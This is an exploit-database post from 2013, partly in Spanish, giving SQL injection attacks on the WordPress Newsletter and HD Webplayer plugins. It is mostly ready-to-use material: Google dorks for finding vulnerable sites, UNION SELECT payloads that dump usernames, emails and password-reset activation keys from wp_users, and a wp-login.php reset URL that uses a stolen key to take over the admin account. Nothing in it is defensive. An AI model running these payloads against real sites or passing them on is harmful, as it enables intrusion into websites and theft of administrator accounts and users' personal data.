-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=00
_ __ __ __ 11 /' \ __ /'__`\ /\ \__ /'__`\ 00 /\_, \ ___ /\_\/\_\ \
\ ___\ \ ,_\/\ \/\ \ _ ___ 11 \/_/\ \ /' _ `\ \/\ \/_/_\_>
Exploit database separated by exploit 00 \/___/ type (local,
remote, DoS, etc.) 11 10 [+] Site : 1337day.com 01 [+] Support
e-mail : submit[at]1337day.com 10 01
######################################### 10 I'm DaOne member from
Inj3ct0r Team 11 #########################################
00-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1###########################################
Exploit Title: WordPress plugins Newsletter SQL Injection
Vulnerability# Date: 2013-02-04# Author: DaOne aka Mocking Bird#
Home: 1337day Inj3ct0r Exploit Database # Software Link:
http://www.satollo.net/plugins/newsletter# Category: webapps/php#
Version: 3.x# Google dork:
inurl:wp-content/plugins/newsletter/do/subscribe.php##########################################
-Exploit-http://{host}/wp-content/plugins/newsletter/do/view.php?id=99
{SQL}Comando 1.union select
1,2,concat(user_login,0x3c2d3e,user_email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
from wp_usersComando 2.union select
1,2,concat(user_login,0x3c2d3e,user_activation_key),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
from wp_usersComando
3.wp-login.php?action=rp&key=KEY&login=admin================================================================================================
SQL Injection: WordPress HD Webplayer Version 1.1 ==
================================================================================================
METODO 1
"Dork's"===============================================================================================
#DORK 1
inurl:/wp-content/plugins/hd-webplayer/playlist.php?videoid=#DORK
2HD_Webplayer_Commercial_Key logo.jpg topleft 50
http===============================================================================================
METODO 2
"Dork's"===============================================================================================#
Dork 1
(config.php)inurl:"/wp-content/plugins/hd-webplayer/config.php?id="#
Dork 2
(playlist.php)inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="#
Dork 3
(General):inurl:"/wp-content/plugins/hd-webplayer/"===============================================================================================
METODO 1
===============================================================================================1
:
playlist.php?videoid=2+/*!UNION*/+/*!SELECT*/+group_concat(ID,0x3a,user_login,0x3a,user_email,0x3b),2,3,4,5,6,7,8,9,10,11+from+wp_users
(este se coloca luego del "hd-webplayer" del Dork
1)===============================================================================================2
:
/*!UNION*/+/*!SELECT*/group_concat(ID,0x3a,user_login,0x3a,user_activation_key,0x3b),2,3,4,5,6,7,8,9,10,11
from wp_users (este se usa para recuperar la clave de activacion,
se coloca en el panel del admin OLVIDE CLAVE y poner el mail que
obtuvimos luego colocar este dork a partir del + que esta en la
URL)===============================================================================================3
: wp-login.php?action=rp&key=KEY&login=admin (aqui convinar
la KEY y el user que
obtuvimos)===============================================================================================
METODO
2===============================================================================================1
: http://www. website
.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION
SELECT
1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11
FROM
wp_users--===============================================================================================2
: http://www. website
.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION
SELECT
1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11
FROM
wp_users--===============================================================================================3
:
wp-login.php?action=rp&key=KEY&login=admin===============================================================================================
